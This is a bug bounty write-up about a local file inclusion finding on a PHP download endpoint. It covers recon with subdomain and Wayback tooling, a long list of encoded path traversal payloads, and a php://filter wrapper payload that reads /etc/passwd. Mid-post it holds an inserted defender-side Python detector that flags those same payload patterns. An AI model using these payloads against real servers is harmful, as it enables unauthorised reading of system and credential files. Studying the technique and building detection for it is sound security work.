# Easy LFI

Hello Hackers!!

I'm going to share one of my latest & fastest findings.

Let's call it **target.com**; they run a bug bounty program with wildcard scope **\*.target.com**.

#### Tools:

* [Subdomainer](https://github.com/Cyber-Guy1/Subdomainer)
* [waybackurls](https://github.com/tomnomnom/waybackurls)
* [gf](https://github.com/tomnomnom/gf)

### <mark style="color:yellow;">**Subdomains Enumeration**</mark>

In this step it's a golden tip to use multiple tools to gather good results. I like to use [**Subdomainer**](https://github.com/Cyber-Guy1/Subdomainer).

Subdomainer is an automation tool for gathering domains & subdomains, whether for a single target or multiple targets. It chains several tools to do the subdomain & domain gathering job thoroughly: it can take a list of domains / targets, run the whole operation on each of them, and once finished it saves the result in a readable & ordered way.

A simple usage of Subdomainer:

**`./subdomainer -t target.com -f true`**

A lot of things come after subdomain gathering; one of them is collecting all URLs from the live hosts and filtering out any interesting parameters or endpoints.

### <mark style="color:yellow;">Collect Them All</mark>

So in this step I use [**waybackurls**](https://github.com/tomnomnom/waybackurls).

Usage of waybackurls: this is a really good tool for bug bounty hunters to fetch every URL the Wayback Machine has archived for a host.

**`cat all_live.txt | waybackurls`**

### <mark style="color:yellow;">Wrapper</mark>

Now that we have all the Wayback URLs, you can grep them to collect the parameters or endpoints you are interested in, for example:

**`grep -iE "redirect="`**

**But that would take a lot of time and effort. To automate this process we can use the** [**gf**](https://github.com/tomnomnom/gf) **tool:**

A wrapper around grep to avoid typing common patterns.

**`cat waybackdata | gf lfi | tee -a lfi.txt`**

After that we can go and check these endpoints manually.

Luckily, I noticed a very promising endpoint `/download.php?file` and my spidey sense got activated.

![](https://media.giphy.com/media/1qErVv5GVUac8uqBJU/giphy.gif)

After visiting this host I found that this endpoint was for downloading PDF files.

When trying to inject `1` into this parameter, it downloads a file containing this error:

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2FGW5euA7dlQFUD3OIDoUG%2Fcode.jpg?alt=media\&token=b0df9e2b-9e28-4fda-8dc2-8ee979ce0334)

So clearly this function's job is to search for the file requested via this parameter in that path and try to fetch it.

Without another thought I injected some payloads like this:

```
..\..\{FILE}
..\..\..\{FILE}
..\..\..\..\{FILE}
..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}
..%255c{FILE}
..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
%2e%2e\{FILE}
%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%252e%252e\{FILE}
%252e%252e\%252e%252e\{FILE}
```

But no luck, I got the same error message.

![](https://media.giphy.com/media/7SF5scGB2AFrgsXP63/giphy.gif)

In spite of that, something was telling me to keep digging into this 🧐

By using [Wappalyzer](https://www.wappalyzer.com/) I found that this host is running PHP, so I used a PHP file wrapper payload:

`php://filter/convert.base64-encode/resource=/etc/passwd`

![](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2F6mTB68Yba4rp5R0pjNdI%2F1.jpg?alt=media\&token=361ccf1e-4735-41c8-ad38-dacd46812fb7)

**php://filter** is a PHP stream wrapper that reads a local file through a filter chain; with `convert.base64-encode` the file's contents come back base64-encoded, which is what lets a pen tester pull a file out through an endpoint that would otherwise choke on the raw bytes. Therefore, any base64 output will need to be decoded to reveal the contents.
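As an added defender-side example (my own code, not part of the original post), the following Python reproduces the triage a reviewer would do over web-server access logs for an endpoint like `/download.php?file=`: it percent-decodes each query value repeatedly (so the double-encoded `%255c` family from the list above resolves), folds backslashes to slashes, and flags traversal sequences, PHP stream wrappers such as `php://filter`, and multi-level encoding. The sample request paths are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample request paths (not from the original post); the
# encodings mirror the payload families in the write-up's list.
SAMPLE_REQUESTS = [
    "/download.php?file=report.pdf",
    "/download.php?file=..%5c..%5c..%5cwindows%5cwin.ini",
    "/download.php?file=..%255c..%255cboot.ini",
    "/download.php?file=%252e%252e%5cconfig.php",
    "/download.php?file=php%3A%2F%2Ffilter%2Fconvert.base64-encode"
    "%2Fresource%3D%2Fetc%2Fpasswd",
    "/index.php?page=home",
]

# After normalisation every separator is "/", so one pattern covers both
# "..\" (Windows style) and "../" (Unix style) sequences.
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")
# PHP stream wrappers that turn a file parameter into a read primitive.
WRAPPER = re.compile(r"^(?:php|data|expect|phar|zip|glob)://", re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Decode until stable; %255c takes two passes. Returns (value, rounds)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def classify(request):
    """Return the finding labels for one request path (empty if clean)."""
    findings = []
    for pair in request.partition("?")[2].split("&"):
        name, _, raw = pair.partition("=")
        value, rounds = decode_fully(raw)
        value = value.replace("\\", "/")   # fold Windows separators
        if TRAVERSAL.search(value):
            findings.append(f"{name}: path traversal")
        if WRAPPER.match(value):
            findings.append(f"{name}: php stream wrapper")
        if rounds > 1:
            findings.append(f"{name}: double percent-encoding")
    return findings

def scan(requests):
    """Map each suspicious request to its findings; clean ones are dropped."""
    return {r: f for r in requests if (f := classify(r))}
```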

So let's decode this base64 string:

**`echo "BASE64_STRING" | base64 -d`**

![base64 decoded output from /etc/passwd on a UNIX / Linux system](https://2341258708-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNXCJWNoU0PexwJ6yBpmG%2Fuploads%2Fe1jsDgw00vSSai581I5p%2F1?alt=media)

And we got our **/etc/passwd** file decoded.

![](https://media.giphy.com/media/3ohhweiVB36rAlqVCE/giphy.gif)

### <mark style="color:yellow;">EXTRA</mark>

Although these tools and techniques are few, there is a lot that can be done with them. You can use the many [Gf-Patterns](https://github.com/1ndianl33t/Gf-Patterns) to hunt for:

* XSS
* SSRF
* IDOR
* SSTI
* open redirect
* etc.

A great place to find more LFI bypass tricks:

{% embed url="https://book.hacktricks.xyz/pentesting-web/file-inclusion" %}

> Thanks For Reading
